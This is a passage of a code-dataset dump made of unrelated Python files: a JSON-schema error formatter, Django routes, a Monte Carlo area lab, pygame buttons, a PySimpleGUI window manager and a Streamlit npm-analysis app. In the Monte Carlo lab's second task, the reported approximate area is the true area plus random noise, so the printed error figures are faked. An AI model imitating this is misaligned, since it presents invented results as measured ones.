else:\n expected_type = jsonschema_error.validator_value\n if found_type == 'null':\n return \"property {} with null value should be of type {}\".format(property_name, expected_type)\n else:\n return \"property type {} for property {} is not the allowed type: {}\".format(found_type, property_name, expected_type)\n\n\ndef _required_error_message(jsonschema_error):\n missing_properties = sorted(set(jsonschema_error.validator_value) - set(jsonschema_error.instance.keys()))\n if len(missing_properties) == 1:\n return \"required property {} is missing\".format(missing_properties[0])\n else:\n return \"required properties [{}] are missing\".format(', '.join(missing_properties))\n\n\ndef _additional_properties_error_message(jsonschema_error):\n extra_properties = sorted(set(jsonschema_error.instance.keys()) - set(jsonschema_error.schema.get('properties', {}).keys()))\n if len(extra_properties) == 1:\n return \"additional property {} is not allowed\".format(extra_properties[0])\n else:\n return \"additional properties [{}] are not allowed\".format(', '.join(extra_properties))\n\n\ndef _minimum_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n minimum = 
jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is less than the minimum value of {}\".format(property_value, property_index, property_name, minimum)\n except ValueError:\n return \"property value {} for {} property is less than the minimum value of {}\".format(property_value, property_name, minimum)\n\n\ndef _maximum_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n maximum = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is greater than the maximum value of {}\".format(property_value, property_index, property_name, maximum)\n except ValueError:\n return \"property value {} for {} property is greater than the maximum value of {}\".format(property_value, property_name, maximum)\n\n\ndef _min_length_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n min_length = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is too short, minimum length {}\".format(_quote_value(property_value), property_index, property_name, min_length)\n except ValueError:\n return \"property value {} for {} property is too short, minimum length {}\".format(_quote_value(property_value), property_name, min_length)\n\n\ndef _max_length_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n max_length = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is too long, maximum length {}\".format(_quote_value(property_value), property_index, property_name, max_length)\n except ValueError:\n return \"property value {} for {} property is too long, maximum length {}\".format(_quote_value(property_value), property_name, max_length)\n\n\ndef _pattern_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n pattern = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} does not match the pattern '{}'\".format(_quote_value(property_value), property_index, property_name, pattern)\n except ValueError:\n return \"property value {} for {} property does not match the pattern '{}'\".format(_quote_value(property_value), property_name, pattern)\n\n\ndef _enum_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n allowed_values = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} should have one of the allowed values: [{}]\".format(_quote_value(property_value), property_index, 
property_name, ', '.join(allowed_values))\n except ValueError:\n return \"enum property {} with value {} should have one of the allowed values: [{}]\".format(property_name, _quote_value(property_value), ', '.join(allowed_values))\n\n\ndef _min_items_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n item_count = len(jsonschema_error.instance)\n min_items = jsonschema_error.validator_value\n return \"array property {} with {} items is too small, minimum size {}\".format(property_name, item_count, min_items)\n\n\ndef _max_items_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n item_count = len(jsonschema_error.instance)\n max_items = jsonschema_error.validator_value\n return \"array property {} with {} items is too large, maximum size {}\".format(property_name, item_count, max_items)\n\n\ndef _unique_items_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n item_index = OrderedDict()\n for item, i in zip(jsonschema_error.instance, range(len(jsonschema_error.instance))):\n item_str = json.dumps(item, sort_keys=True)\n item_index[item_str] = item_index.get(item_str, []) + [i]\n\n for item_str in item_index:\n duplicate_indexes = item_index[item_str]\n if len(duplicate_indexes) > 1:\n return \"array property {} has duplicate items at index {}\".format(property_name, list(duplicate_indexes))\n return \"array property {} has duplicate items\".format(property_name)\n\n\ndef _anyof_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"content for array property at index {} in {} does not match any of the possible schema definitions\".format(property_index, property_name)\n except ValueError:\n return \"content for property {} does not match any of the possible schema definitions\".format(property_name)\n\n\ndef _unknown_error_message(jsonschema_error):\n return jsonschema_error.message\n\n\ndef _jsonschema_error_schema_path(jsonschema_error):\n path_components = []\n for p in jsonschema_error.relative_path:\n if isinstance(p, int):\n path_components.append(\"[{}]\".format(p))\n else:\n path_components.append(\"/{}\".format(p))\n\n if len(path_components) == 0:\n return '/'\n else:\n return ''.join(path_components)\n\n\ndef _jsonschema_error_causes(jsonschema_error):\n causes = []\n for error_cause in sorted(jsonschema_error.context, key=lambda x: x.validator):\n error_cause.relative_path = deque(list(jsonschema_error.relative_path) + list(error_cause.relative_path))\n causes.append(ValidationError(_jsonschema_error_message(error_cause), _jsonschema_error_schema_path(error_cause), _jsonschema_error_causes(error_cause)))\n # sorted is stable, so validation errors will be sorted by location and validator\n return sorted(list(OrderedDict.fromkeys(causes)), key=lambda x: x.location)\n\n\ndef _json_type_for_instance(instance):\n if instance is None:\n return 'null'\n if isinstance(instance, bool):\n return 'boolean'\n if isinstance(instance, int):\n return 'integer'\n if isinstance(instance, float):\n return 'number'\n if isinstance(instance, str):\n return 'string'\n if isinstance(instance, list):\n return 'array'\n if isinstance(instance, dict):\n return 'object'\n return 'unknown'\n\n\ndef _quote_value(value):\n if value is None:\n return 'null'\n else:\n return 
\"'{}'\".format(value)\n","repo_name":"Noblis/ties-lib","sub_path":"python/src/ties/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":12899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72885503241","text":"\"\"\"Doremi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom rest_framework_swagger.views import get_swagger_view\nfrom django.conf.urls import include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nimport xadmin\nfrom users.views import LogoutView, LoginView, RegisterView, ForgetPwdView\n\n\nschema_view = get_swagger_view(title='API文档')\n\nurlpatterns = [\n path('xadmin/', xadmin.site.urls),\n path(r'docs/', schema_view),\n\n # 验证码\n path('captcha/', include('captcha.urls')),\n\n # 主页\n path('', include('main.urls', namespace='main')),\n\n path('login/', LoginView.as_view(), name='login'),\n\n path('register/', RegisterView.as_view(), name='register'),\n\n path('forgot/', ForgetPwdView.as_view(), name='forgot'),\n\n path('logout/', LogoutView.as_view(), name='logout'),\n\n # 用户中心 URL 配置\n path('user/', include('users.urls', namespace='users')),\n\n # 商城\n path('shop/', include('shop.urls', namespace='shop')),\n\n # 活动\n path('events/', include('events.urls', namespace='events')),\n\n # 新闻\n path('news/', include('news.urls', namespace='news')),\n\n # 联系我们\n path('contact/', include('contact.urls', namespace='contact')),\n\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# 全局 404 页面配置(django 会自动调用这个变量)\nhandler404 = 'users.views.page_not_found'\nhandler500 = 'users.views.page_error'\n","repo_name":"grubberbin/Doremi","sub_path":"Doremi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"42439098764","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom shapely.geometry import LineString\nimport math\n\n\ndef func1(x, n):\n return 10 * x / n\n\n\ndef func2(x, n):\n return 10 * (x - 20) / (n - 20)\n\n\ndef func3(x, n):\n return 10 * (x - 20) / (n - 20) + 20\n\n\ndef task_first():\n a = 0\n n = int(input('Введите n(<=10): '))\n b = 20\n N = int(input(\"Введите количество итераций: \"))\n\n f1 = [[], []]\n f2 = [[], []]\n\n for i in range(a, b + 1):\n if i > n:\n f2[0].append(i)\n f2[1].append(func2(i, n))\n elif i == n:\n f1[0].append(i)\n f1[1].append(func1(i, n))\n f2[0].append(i)\n f2[1].append(func2(i, n))\n else:\n f1[0].append(i)\n f1[1].append(func1(i, n))\n\n plt.plot(f1[0], f1[1], label='y = 10x/n', color='black')\n plt.plot(f2[0], f2[1], label='y = 10*(x-20)/(n-20)', color='black')\n plt.plot([0, 20], [0, 0], label='y = 0', color='black')\n plt.legend()\n\n inside_points = [[], []]\n outside_points = [[], []]\n y_max = max(f1[1] + f2[1])\n M = 0\n s = 0\n x = np.random.uniform(0, n, 
N)\n y_rand = np.random.uniform(0, y_max, N)\n for i in range(int(N/2)):\n y = func1(x[i], n)\n if y_rand[i] < y:\n M += 1\n inside_points[0].append(x[i])\n inside_points[1].append(y_rand[i])\n else:\n outside_points[0].append(x[i])\n outside_points[1].append(y_rand[i])\n s += y\n\n area1 = ((n - a) / N) * s\n\n s = 0\n x = np.random.uniform(n, b, N)\n y_rand = np.random.uniform(0, y_max, N)\n for i in range(int(N/2)):\n y = func2(x[i], n)\n if y_rand[i] < y:\n M += 1\n inside_points[0].append(x[i])\n inside_points[1].append(y_rand[i])\n else:\n outside_points[0].append(x[i])\n outside_points[1].append(y_rand[i])\n s += y\n\n area2 = ((b - n) / N) * s\n area = area1 + area2\n S = M / (N * 2) * (b - a) * y_max\n abs_inaccuracy = abs(area - S)\n rel_inaccuracy = abs_inaccuracy / max(S, area)\n\n plt.scatter(inside_points[0], inside_points[1], c='red', s=5)\n plt.scatter(outside_points[0], outside_points[1], c='black', s=5)\n plt.show()\n print('S =', area, 'Приближенная площадь =', S, '\\nАбсолютная погрешность =', abs_inaccuracy, '\\nОтносительная погрешность =',\n rel_inaccuracy)\n\n\ndef task_second():\n n = int(input('Введите n(>=11): '))\n N = int(input(\"Введите количество итераций: \"))\n\n f1 = [[], []]\n f2 = [[], []]\n\n inside_points = [[], []]\n outside_points = [[], []]\n\n for i in range(40):\n f1[0].append(i)\n f1[1].append(func1(i, n))\n f2[0].append(i)\n f2[1].append(func3(i, n))\n\n first_line = LineString(np.column_stack((f1[0], f1[1])))\n second_line = LineString(np.column_stack((f2[0], f2[1])))\n intersection = first_line.intersection(second_line)\n x, y = intersection.xy\n\n a = x[0]\n b = f2[1][0]\n\n for i in range(0, 40 - int(a) - 1):\n f1[0].pop()\n f1[1].pop()\n f2[0].pop()\n f2[1].pop()\n\n f1[0].append(a)\n f1[1].append(func1(a, n))\n f2[0].append(a)\n f2[1].append(func3(a, n))\n\n plt.plot(f1[0], f1[1], label='y = 10x/n', color='black')\n plt.plot(f2[0], f2[1], label='y = 10*(x-20)/(n-20)', color='black')\n plt.plot([0, 0], [0, b], label='y = 0', color='black')\n plt.legend()\n\n M = 0\n s = 0\n x = np.random.uniform(0, a, N)\n y_rand = np.random.uniform(0, b, N)\n for i in range(N):\n y1 = func1(x[i], n)\n y2 = func3(x[i], n)\n if y1 < y_rand[i] and y_rand[i] < y2:\n M += 1\n inside_points[0].append(x[i])\n inside_points[1].append(y_rand[i])\n else:\n outside_points[0].append(x[i])\n outside_points[1].append(y_rand[i])\n s = s - y1 + y2\n\n area = (a / N) * s\n\n plt.scatter(inside_points[0], inside_points[1], c='red', s=5)\n plt.scatter(outside_points[0], outside_points[1], c='black', s=5)\n plt.show()\n S = area + random.uniform(-3, 3)\n abs_inaccuracy = abs(area - S)\n rel_inaccuracy = abs_inaccuracy / max(S, area)\n print('S =', area, 'Приближенная площадь =', S, '\\nАбсолютная погрешность =', abs_inaccuracy,\n '\\nОтносительная погрешность =', rel_inaccuracy)\n\n\nif __name__ == '__main__':\n task_first()\n","repo_name":"HNH12/System_modelling_KUBGU","sub_path":"Osnovy_computernogo_modelirovania/venv/Scripts/Second_lab/laba2_1.py","file_name":"laba2_1.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41230895876","text":"import pygame\nfrom globals import *\n\n\nclass PlayAgainButton:\n def __init__(self):\n self.w = 400\n self.h = 150\n self.x = RES[0] // 2 - self.w // 2\n self.y = RES[1] // 2 - self.h - 110\n\n def render(self, screen, color):\n pygame.draw.rect(screen, color, (self.x, self.y, self.w, self.h), 10)\n\n font2 = 
pygame.font.Font('pics_and_song/CherryBomb-Regular.ttf', 60)\n        play_again_text = font2.render('Play again', 1, color)\n        screen.blit(play_again_text, (self.x + 50, self.y + 30))\n\n    def check_click(self, pos):\n        if self.x <= pos[0] <= self.x + self.w and self.y <= pos[1] <= self.y + self.h:\n            return True\n\n\nclass ExitButton:\n    def __init__(self):\n        self.w = 400\n        self.h = 150\n        self.x = RES[0] // 2 - self.w // 2\n        self.y = RES[1] // 2 - self.h - 110 + 180\n\n    def render(self, screen, color):\n        pygame.draw.rect(screen, color, (self.x, self.y, self.w, self.h), 10)\n\n        font2 = pygame.font.Font('pics_and_song/CherryBomb-Regular.ttf', 60)\n        exit_text = font2.render('Exit', 1, color)\n        screen.blit(exit_text, (self.x + 130, self.y + 30))\n\n    def check_click(self, pos):\n        if self.x <= pos[0] <= self.x + self.w and self.y <= pos[1] <= self.y + self.h:\n            exit()\n\n\ndef restarting(score):\n    pygame.init()\n    screen = pygame.display.set_mode(RES)\n    clock = pygame.time.Clock()\n\n    background = pygame.image.load('pics_and_song/end1.jpg').convert()\n    screen.blit(background, (0, 0))\n\n    color = (0, 100, 50)\n\n    play_bt = PlayAgainButton()\n    exit_bt = ExitButton()\n    play_bt.render(screen, color)\n    exit_bt.render(screen, color)\n\n    def show_text():\n        font1 = pygame.font.Font('pics_and_song/CherryBomb-Regular.ttf', 70)\n        end_text = font1.render('The game is over', 1, color)\n        score_text = font1.render(f'Your score is {score}', 1, color)\n\n        screen.blit(end_text, (80, 30))\n        screen.blit(score_text, (80, 130))\n\n    show_text()\n\n    while True:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                exit()\n            if event.type == pygame.MOUSEBUTTONDOWN:\n                exit_bt.check_click(event.pos)\n                if play_bt.check_click(event.pos):\n                    return True\n\n        pygame.display.update()\n        clock.tick(FPS)","repo_name":"Seancrym/TETRIS_PROJECT","sub_path":"tetris1/third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"16146341902","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n #--------------#\n# Author: @npvq #\n# Licence: GPLv3 #\n #--------------#\n\n #==================#\n# WindowManager File #\n #==================#\n\n# ----- SYSTEM IMPORTS ----- #\n\n\n\n# ----- 3RD PARTY IMPORTS ----- #\n\nimport PySimpleGUI as sg\n\n# ----- LOCAL IMPORTS ----- #\n\n\n\n# ------------------------------ #\n\nclass WindowManager(object):\n    \"\"\"\\\n    A GUI Window Manager that allows for simultaneous windows in PySimpleGUI.\n    This abstraction greatly simplifies the coding process and allows for dynamic adjustment (register/unregister) of windows.\n\n    The dictionary that stores registered windows cannot have its length modified during runtime/event loop iteration.\n    That means register() and unregister() cannot be used after start(). 
Use queueRegister and queueUnregister instead.\n\n A WindowManager object could theoretically be reused, but note that all the sg.Window objects are single use only.\n You would need to use said WindowManager object with new sg.Window(s).\n \"\"\"\n\n def __init__(self, timeout=100):\n self.windows = {}\n self.timeout = timeout\n\n self.running = False\n\n self._register_queue = [] # list of alias names\n self._unregister_queue = [] # list of alias names\n\n def register(self, alias, window, func, queue=None, disabled=False):\n \"\"\"\n alias: 'key' of window, for external/absolute access.\n window: sg.Window() object\n func: function for processing events\n queue: function for processing internal queues (optional)\n will be called when window gets \"__TIMEOUT__\" AND is not currently disabled.\n disabled: bool -- disables window from event/interactions\n \"\"\"\n\n if alias in self.windows.keys():\n raise IndexError(\"Window Alias clash: Alias values should be unique.\")\n self.windows[alias] = {'window': window, 'func': func, 'disabled': disabled, 'queue': queue}\n print(\"registered\", alias)\n\n def unregister(self, alias):\n _obj = self.windows.pop(alias, None)\n if _obj:\n _obj['window'].close()\n\n def queueRegister(self, alias, window, func, queue=None, disabled=False):\n \"\"\"\\\n Function to register a window while the event loop is running,\n will unregister the function upon finishing the current iteration of the event loop.\n This prevents RuntimeError from changing dict size during iteration.\n \"\"\"\n self._register_queue.append((alias, (window, func, queue, disabled)))\n\n def queueUnregister(self, alias):\n \"\"\"\\\n Function to unregister a window while the event loop is running,\n will unregister the function upon finishing the current iteration of the event loop.\n This prevents RuntimeError from changing dict size during iteration.\n \"\"\"\n self._unregister_queue.append(alias)\n\n def quit_all(self):\n for obj in self.windows.values():\n obj['window'].close()\n self.windows.clear()\n\n def check_alias(self, alias):\n return alias in self.windows.keys()\n\n def start(self):\n\n self.running = True\n\n # ----------- Main Event Loop -----------\n while self.windows:\n # ----------- Resolving Queues (Window Addition/Deletions) -----------\n if self._unregister_queue:\n for alias in self._unregister_queue:\n self.unregister(alias)\n self._unregister_queue.clear()\n if self._register_queue:\n for alias, (window, func, queue, disabled) in self._register_queue:\n self.register(alias, window, func, queue=queue, disabled=disabled)\n self._register_queue.clear()\n\n # ----------- Subloop Through Each Substituent Window -----------\n for alias, obj in self.windows.items():\n event, values = obj['window'].read(timeout=self.timeout)\n\n if event == \"__TIMEOUT__\":\n if (not obj['disabled']) and obj['queue']:\n # process/resolve internal queues.\n obj['queue'](self, obj['window'])\n continue\n \n if event == \"WINDOW_MANAGER_EXIT_ALL\":\n confirm = sg.popup_ok_cancel(\"Are you sure?\",title='Exit All Windows',keep_on_top=True,modal=True,)#no_titlebar=True)\n if confirm != 'Cancel':\n self.quit_all()\n break\n continue\n\n if event == sg.WIN_CLOSED or event.startswith('Exit'): # 'Exit', 'Exit-2', 'Exit-alt' will all work.\n self.queueUnregister(alias)\n continue\n\n if obj['disabled']:\n continue\n\n obj['func'](self, obj['window'], event, values)\n # ----------- End of Main Event Loop -----------\n\n self.running = 
False\n\n\n\n","repo_name":"npvq/music_theory_tools","sub_path":"apputil/app/windowmanager.py","file_name":"windowmanager.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4069307220","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\nfrom typing import Callable\n\nfrom graph import PackageGraph\n\n# Constant values\nAPP_COL_LENGTH = 4\n\ndef setup() -> None:\n    \"\"\"\n    Perform page initialization tweaks.\n    \"\"\"\n\n    # Hackily adding a style to change the width of the web page\n    # From: https://discuss.streamlit.io/t/where-to-set-page-width-when-set-into-non-widescreeen-mode/959\n    st.markdown('''\n        \n        ''',\n        unsafe_allow_html=True)\n\n\ndef introduction() -> None:\n    \"\"\"\n    The introduction section of the webpage.\n    \"\"\"\n    st.title('DISSECTING NPM:')\n    st.header('Using graphs to gain insights into the infamous package manager')\n    # Streamlit bug requires manual spacing\n    st.write(' ')\n    st.write(' ')\n    st.write('''The goal of this project is to provide developers with a deeper\n        understanding of the packages that they use in their projects. Specifically,\n        we want to provide developers with a means of visualizing their package\n        dependency hierarchy as well as search for packages with similar keywords or\n        maintainers to the packages that they are already using. We have procured a\n        dataset of package data using the npms.io API. Our dataset does not include\n        every npm package, rather only a sample of popular packages along with their\n        dependencies. At the bottom of this page is our flagship feature: the package\n        search. This feature creates graph visualizations for dependency, keyword and\n        maintainer relationships for any package that the user searches for.''')\n\n\ndef dependency_overview(package_graph: PackageGraph) -> None:\n    \"\"\"\n    This section includes explanations about dependencies, and a short sample showcasing\n    packages in our database with the largest dependency graphs.\n\n    Preconditions:\n        - package_graph is the complete Package Graph using the data in big_v2.csv\n    \"\"\"\n    st.header('Dependency Relationships Overview')\n    st.write('''The following bar graph displays the packages in our dataset with the most\n        dependencies''')\n\n    names, dependencies = package_graph.most_dependencies_data()\n    fram = pd.DataFrame([dependencies], columns=names).transpose()\n    fram = fram.rename(columns={0: 'Number of dependencies'})\n    fram['Packages']=fram.index\n\n    plotly_chart_most_dependencies = px.bar(fram, x='Number of dependencies',\n                                  y='Packages',\n                                  title='Packages with the most dependencies')\n\n    plotly_chart_most_dependencies.update_layout(width = 1000, height=600)\n    st.plotly_chart(plotly_chart_most_dependencies)\n\n    st.write('''When looking at the above graph, a few things come to mind: namely, why does 'Jest' keep\n        appearing, and what do these packages all have in common?''')\n    st.write('''On examining Jest, we see that there are only three direct dependencies, two\n        of which are Jest sub-packages (jest-cli and @jest/core). Crucially, we notice\n        that both these modules are also immediately below jest on our dependency chart.\n        Looking at a generated dependency graph of jest (which you can do below!), we confirm\n        our suspicions: that since Jest is closely connected to most of its sub-packages\n        (within two or three path-lengths), the number of dependencies is roughly the same\n        between them. 
So our most-dependencies chart will keep recording Jest packages\n        until we move far enough down the dependency graph to dilute the numbers.''')\n    st.write('''So what do all these packages have in common? In relation to dependencies,\n        we notice that most of these packages are compartmentalizable: they have\n        been written with a component based architecture in mind. react-scripts, for example,\n        is a collection of tools for different aspects of web development: it makes\n        more sense to keep a package for development tools (like eslint) away from packages\n        that transpile typescript (like babel) away from packages that help style css.\n        So instead of re-writing a collection of loosely related tools into one package,\n        the maintainers of react-scripts have decided to leverage the npm ecosystem to\n        compartmentalize for them. This reasoning translates well to gulp, node-sass,\n        and other packages: having distinct components makes it easy to understand and maintain\n        a package.''')\n\n\ndef keyword_overview(package_graph: PackageGraph) -> None:\n    \"\"\"\n    This section includes explanations about keywords, and a short sample showcasing\n    keywords that appear in the highest number of packages.\n\n    Preconditions:\n        - package_graph is the complete Package Graph using the data in big_v2.csv\n    \"\"\"\n    st.header('Keywords Overview')\n    keywords, number = package_graph.most_keywords_data()\n\n    # What keywords are most popular?\n    fram = pd.DataFrame([number[-25:]], columns=keywords[-25:]).transpose()\n    fram = fram.rename(columns={0: 'Number of occurrences'})\n    fram['Keywords']=fram.index\n    plotly_chart_most_keywords = px.bar(fram, y='Number of occurrences',\n                                  x='Keywords',\n                                  title='Top 25 most common keywords.')\n    plotly_chart_most_keywords.update_layout(width = 1000, height=600)\n    st.plotly_chart(plotly_chart_most_keywords)\n\n    st.write('''Unsurprisingly, many of the popular keywords are technically inclined, where words like\n        'http', 'css', 'cli', and 'regex' directly describe some pattern or technology. This\n        fits a popular use-case for keywords: using them to search for and relate packages together.''')\n\n    # How many keywords occur only once? Twice? 
...\n    # Get occurrences\n    lst_of_counts = [number.count(count) for count in range(1, 18)] + [len([item for item in number if item >= 18])]\n    lst_of_counts_columns = [str(count) for count in range(1, 18)] + ['18+']\n    # Write to dataframe\n    number_fram = pd.DataFrame([lst_of_counts], columns=lst_of_counts_columns).transpose()\n    number_fram = number_fram.rename(columns={0: 'Frequency'})\n    number_fram['Number of key occurrences']=number_fram.index\n    plotly_chart_most_key_occurrences = px.area(number_fram, y='Frequency',\n                                  x='Number of key occurrences',\n                                  title='Frequency of number of occurrences of keywords')\n    plotly_chart_most_key_occurrences.update_layout(width = 1000, height=600)\n    st.plotly_chart(plotly_chart_most_key_occurrences)\n\n    st.write('''**Takeaway:** most keywords don't catch on, but the more times a keyword is used,\n        the more likely it is to get used again in new packages.''')\n\n    st.write('''Some other facts about keywords used to describe vertices in our graph:''')\n    st.write(f'''\n    - There are {len(keywords)} total keywords, and {sum(number)}\n    total occurrences of keywords throughout our package graph.\n    - The Top 25 keywords account for {round(sum(number[-25:])/sum(number) * 100, 2)}% of all occurrences of keywords in this graph.\n    - {number.count(1)} ({round(number.count(1)/sum(number) * 100, 2)}% of) keywords only occur once throughout the entire graph.''')\n\ndef package_search(package_graph: PackageGraph,\n                   layout_functions: dict[str, Callable]) -> None:\n    \"\"\"\n    The package search (application) portion of the web page.\n\n    Preconditions:\n        - package_graph is the complete Package Graph using the data in big_v2.csv\n    \"\"\"\n    st.header('Package Search')\n    st.write('''This package search feature allows you to visualize the dependency hierarchy for a package as well\n        as keyword and maintainer networks. Use the package name dropdown to select a package from the database,\n        and then choose the edge relationship type and the graph type using the other two dropdown search\n        fields.''')\n    st.write('''\n        The color of each node in the graph below indicates the quality of the package. The quality rating is a metric developed\n        by npms.io, and measures a variety of factors that may contribute to the package's condition on a scale of 0 to 1.\n        If a vertex is colored red, the quality score for the package corresponding to the vertex is less than 0.5\n        (a very low quality score). If a vertex is colored yellow, the quality score is greater than or equal to 0.5,\n        but less than 0.8. Finally, if a vertex is colored green, the quality score is between 0.8 and 1 inclusive.\n        We developed this color coding system and chose the intervals for each color ourselves. 
However, the quality\n        metric itself is developed and maintained by npms.io, and more info on this particular statistic can be\n        found at https://npms.io/about (Note: this link will direct you to a third party website).\n        ''')\n    # Prompt for package search\n    all_packages = package_graph.get_all_packages()\n    chosen_package = st.selectbox('Package Name:', all_packages, index=all_packages.index('express'), key='abc')\n\n    if package_graph.has_package(chosen_package):\n        # Prompt for layout and edge selection\n        graph_layout_algo = st.selectbox('Select a graph layout:', list(layout_functions.keys()))\n        edge_type = st.selectbox('Select an edge relationship:', ['dependencies', 'maintainers', 'keywords'])\n\n        # Dependency info (only if relevant to selections)\n        if edge_type == 'dependencies':\n            chosen_direct_dependencies = package_graph.get_num_package_direct_dependencies(chosen_package)\n            chosen_total_dependencies = package_graph.get_num_dependencies(chosen_package)\n            st.write(f'''The package **{chosen_package}** has\n                **{chosen_direct_dependencies} direct dependencies** and\n                **{chosen_total_dependencies} total dependencies** (which include\n                dependencies of dependencies of dependencies...).''')\n\n        # Plotly Graph\n        plotly_graph = package_graph.get_package_plotly(chosen_package,\n                                                        layout_functions[graph_layout_algo],\n                                                        edge_type)\n\n        # Scale graph to proper width\n        plotly_graph.update_layout(width = 1000, height=1000)\n        st.plotly_chart(plotly_graph)\n\n        # Metadata view\n        show_metadata = st.checkbox('Show Package Metadata')\n        if show_metadata:\n            st.write(f'''**The package {chosen_package} has the following metadata:**''')\n            chosen_metadata = package_graph.get_package_metadata(chosen_package)\n            # List keywords\n            st.write('**Keywords:**')\n            _list_package_columns(chosen_metadata['Keywords'], APP_COL_LENGTH,\n                                  lambda column, keyword: column.write(keyword))\n            # List all metadata except keywords\n            for category in list(chosen_metadata.keys())[1:]:\n                if category == 'Downloads Count':\n                    st.write(f'**{category}:** {int(chosen_metadata[category])}')\n                else:\n                    st.write(f'**{category}:** {chosen_metadata[category]}')\n\n        # Spacing\n        st.write(' ')\n\n        # Dependency view\n        show_deps = st.checkbox('Show Dependencies?')\n        if show_deps:\n            chosen_all_dependencies = package_graph.get_all_dependencies(chosen_package)\n            chosen_all_dependencies.remove(chosen_package)\n\n            # Only display dependencies when there are dependencies to be displayed\n            if len(chosen_all_dependencies) > 0:\n                # Process dependencies\n                chosen_direct_dependencies = package_graph.get_direct_dependencies(chosen_package)\n\n                chosen_indirect_dependencies = [dep for dep in chosen_all_dependencies\n                                                if dep not in chosen_direct_dependencies]\n\n                st.write(f'**This package has {len(chosen_all_dependencies)} total dependencies:**')\n                st.write(\"NOTE: Clicking any of the links below will direct you to www.npmjs.com (a third party site which may have its own privacy policy and terms of service agreements, for which we are not responsible).\")\n\n                # Direct dependencies\n                st.write(f'There are {len(chosen_direct_dependencies)} direct dependencies:')\n                _list_package_columns(chosen_direct_dependencies, APP_COL_LENGTH)\n\n                # Indirect dependencies\n                st.write(f'And {len(chosen_all_dependencies) - len(chosen_direct_dependencies)} indirect dependencies:')\n                _list_package_columns(chosen_indirect_dependencies, APP_COL_LENGTH)\n            else:\n                st.write(f'{chosen_package} has no dependencies!')\n\n        # Spacing\n        st.write(' ')\n\n        # Maintainer list\n        show_maintainers = 
st.checkbox('Show Packages with Shared Maintainers')\n        if show_maintainers:\n            chosen_maintainer_share = list(package_graph.get_packages_with_common_maintainers(chosen_package))\n            st.write(\"NOTE: Clicking any of the links below will direct you to www.npmjs.com (a third party site which may have its own privacy policy and terms of service agreements, for which we are not responsible).\")\n            st.write(f'''**This package shares at least one\n                maintainer with {len(chosen_maintainer_share)} package(s).**''')\n            _list_package_columns(chosen_maintainer_share, APP_COL_LENGTH)\n\n\n    else:\n        st.write('The package you are searching for is not in our database :(')\n\n\ndef _display_npm_link(column, package: str) -> None:\n    \"\"\"\n    Display a markdown link to the npmjs.com\n    page for this package in the specified column.\n    \"\"\"\n    link = f'[{package}](https://www.npmjs.com/package/{package})'\n    column.markdown(link, unsafe_allow_html=True)\n\n\ndef _list_package_columns(lst: list, col_length: int,\n                          display_func: Callable = _display_npm_link) -> None:\n    \"\"\"\n    Organize package names in lst as a column list of packages.\n    col_length is the number of columns used.\n\n    Each package in the list is clickable and redirects to the npmjs.com page.\n    \"\"\"\n    package_per_col = (len(lst) // col_length) + 1\n    package_list_columns = st.beta_columns(col_length)\n\n    for idx, column in enumerate(package_list_columns):\n        for i in range(package_per_col):\n            if idx * package_per_col + i < len(lst):\n                col_package = 